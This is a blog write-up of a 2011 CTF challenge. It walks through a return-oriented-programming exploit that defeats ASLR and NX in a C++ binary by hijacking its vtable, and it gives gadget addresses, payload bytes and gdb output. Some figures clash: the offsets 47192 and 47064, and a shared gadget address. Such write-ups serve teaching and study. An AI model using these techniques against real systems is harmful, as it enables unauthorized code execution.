Friday, April 29, 2011

PlaidCTF 2011 Challenge #17: C++5x writeup

This is a challenge that required a lot of work from Zardus and me, but we think that the solution we came up with is really interesting. Some other teams apparently just disabled libc ASLR to make things easier, instead we dynamically calculated the address of the exec() we wanted to call, and jumped to it.

The challenge involved a C++ binary with the following usage:

  # ./first_cpp
  Usage: ./first_cpp <name> <point>

The binary creates a C++ object (which has one method) on the stack in main(), and then calls a function which has an unrestricted buffer overflow followed by a call to the aforementioned method. As well as the overflow, the second function conveniently copies part of the buffer into the bss.

  void __cdecl stupid_function(int obj_ptr, int points, int name_ptr)
    char src; // [sp+26h] [bp-32h]@1

    sprintf(&src, "Uploading... [%s]: %d pts\n", name_ptr, points);
    memcpy(s, &src, 0x32u);
    (**(int (__cdecl ***)(_DWORD, _DWORD))obj_ptr)(obj_ptr, s);

It is important to note that the function with the overflow never returns, send_to_localhost() calls exit() after sending a UDP packet to localhost containing the points variable.

Normally, exploiting this would be a piece of cake. However, the machine had both ASLR and NX enabled and functional. A further complication was the absense of any helpful libc calls in the GOT due to the fact that the binary does not call such functions.

The answer lies in the method call. Since the C++ object resides on the stack, and we can overwrite it with the buffer overflow, we can change the address that is eventually called. A C++ method call in such a fashion consists of the following instructions:

  mov     eax, [ebp+obj_ptr]
  mov     eax, [eax]
  mov     edx, [eax]
  mov     dword ptr [esp+4], offset s
  mov     eax, [ebp+obj_ptr]
  mov     [esp], eax
  call    edx

The first mov dereferences the pointer (passed as an argument to the function) into the location of the object on the stack (the first word of which is the location of the virtual table for the object). The second mov acquires the address of the virtual table, and the third mov gets the address of the function to be called. The exploit involves overwriting the object on the stack to point to our own fake virtual table, which is conveniently copied for us into the bss. Luckily, the bss remains stable in memory, which makes this task fairly easy.

The general idea of the exploit is as follows: first, we acquire the address of a libc function that *is* in the GOT into eax. Then, using the offset between that function and a call to exec (we didn't use system() because system() drops privilages), we increment eax until it is pointing to the exec call. Finally, we jump to a "call eax" instruction. This works because even though libc is in a random location, the relative offsets between the functions are the same. We calculated the offset by subtracting the address of the libc function from the address of the exec call in gdb on the target machine:

  (gdb) p atoi
  $5 = {int (const char *)} 0xf7d50b40
  (gdb) x/i do_system+1128
     0xf7d5c398 : call   0xf7dbc3f0 <__execve>
  (gdb) p 0xf7d5c398 - 0xf7d50b40
  $6 = 47192

In order to carry out our exploit, we ended up using some pretty intricate return-oriented programming. We found several gadgets to help us:

  1. POP_RET: a simple pop, return gadget at 0x080487a1 to clean up the stack after a call
  2. POP3_RET: a simple pop, pop, pop, return gadget at 0x08048a2f for the same reason
  3. JUST_RET: a ret instruction at 0x08048a32 to ret to our next destination
  4. LEAVE_RET: a leave, ret gadget at 0x080487a1
  5. The sprintf stub function call, always at 0x080485ec
  6. A piece of code at 0x08048949 which reads a local variable into eax and eventually calls sendto:

      mov eax, [ebp-0x1C]
      mov [esp], eax
      call _sendto

  7. A piece of code at 0x0804890f which adds 8 to eax and soon calls bzero:

      add eax, 8
      mov [esp], eax
      call _bzero

  8. A piece of code at 0x0804879F which calls eax

The beginning of our exploit is:

  -------- copied into bbs ---------
  00. "AAAA"
  04. "AAAA"
  08. "AAAA"
  12. POP3_RET
  16. POP_RET
  20. "\xe2\x9d\x04\x08"
  24. "\xea\x9d\x04\x08"
  32. "%.4s"
  -------- on the stack ---------
  36. "BBBB"
  40. POP_RET
  44. "\xe6\x9d\x04\x08"

The first 36 bytes are conveniently copied into the bbs, and are used through the rest of the return-oriented program. When the buffer is overflowed, (44) ends up getting written over the virtual table pointer for the C++ object. It then resolves to (24), which resolves to (28). The program then calls LEAVE_RET, which moves ebp (currently pointing at 36) back to esp, allowing us to bypass the inconvenient values on the stack which were copied into the bss. "BBBB" is popped into ebp and we return to the POP_RET instruction (40). This POP_RET allows us to skip over the fake virtual table pointer on the stack. Then the following happens:

  48. POP_RET
  52. "\xe6\x9d\x04\x08"

This pops an address (52) into ebp and returns again. We did this so that ebp would point to writeable memory, as functions sometime expect it to do that. After this, we copy atoi's address to get ready to read it:

  56. "\xec\x85\x04\x08"
  60. POP3_RET
  64. "\xd4\x9d\x04\x08"
  68. "\xee\x9d\x04\x08"
  72. "\x58\x9d\x04\x08"

(56) is the address of sprintf, which we will use to overwrite memory addresses. The destination, (64), lies in the dtors section. We chose arbitrarily for some storage space. The format string, (68), is a pointer to (32) on the bss, and copies 4 bytes. Finally, the argument, (72), is a pointer to atoi's entry in the GOT. We set sprintf's return address (60) to POP3_RET, which cleans the arguments off the stack. After this, we have atoi's address at 0x08049dd4. Now we do a bit of cleanup for future actions:

  76. "\xec\x85\x04\x08"
  80. POP3_RET
  84. "\x3c\x9d\x04\x08"
  88. "\xee\x9d\x04\x08"
  92. "\xda\x9d\x04\x08"

  96. "\xec\x85\x04\x08"
  100. POP3_RET
  104. "\x64\x9d\x04\x08"
  108. "\xee\x9d\x04\x08"
  112. "\xda\x9d\x04\x08"

These two blocks use sprintf to overwrite the GOT entries to sendto (84) and bzero (104). Both of them are overwritten with the value of POP3_RET (12) in bss, which has the result of turning both sendto and bzero into a pop,pop,pop,ret gadget. Then, we move on:

  116. POP_RET
  120. "\xe0\x9d\x04\x08" # 0x8049dec -- where we wrote - 1C
  124. "\x49\x89\x04\x08" # get atoi address into eax
  128. JUST_RET
  132. JUST_RET
  136. JUST_RET
  140. JUST_RET

(116) pops (120) into ebp, which is (64), the address where we copied atoi's address, plus 0x1C. It then returns to (124), which is code gadget (6). This has the effect of moving atoi's address into eax. That gadget ends up calling sendto, which is now POP3_RET, which ends up cleaning up our stack (including the unwanted return address that the call instruction pushes) and returning. We then return to:

  for i in range(5883):
    144. "\x0f\x89\x04\x08"
    148. "AAAA"
    152. "AAAA"

This is an unrolled loop that essentially increments eax by 8 using code gadget (7), which is located at (144). Since that code gadget ends in a call to bzero, which is now POP3_RET, which pops off the return address and (148) and (152) and returns back to the code gadget. This runs 5883 times, which is the distance between atoi and the execve call (47064) divided by 8. Finally, we return to code gadget 8:

  156. "\x9f\x87\x04\x08"
  160. "\xf2\x9d\x04\x08"
  164. "\xf2\x9d\x04\x08"

(160) and (164) point to zero-filled space in the bss for the args and env of the execve call. The program name, unfortunately, is co-opted by the call instruction pushing the return value. Luckily, that return value points to a "string" in the code section and we can create the appropriate file.

And, after all that horror, we're done!

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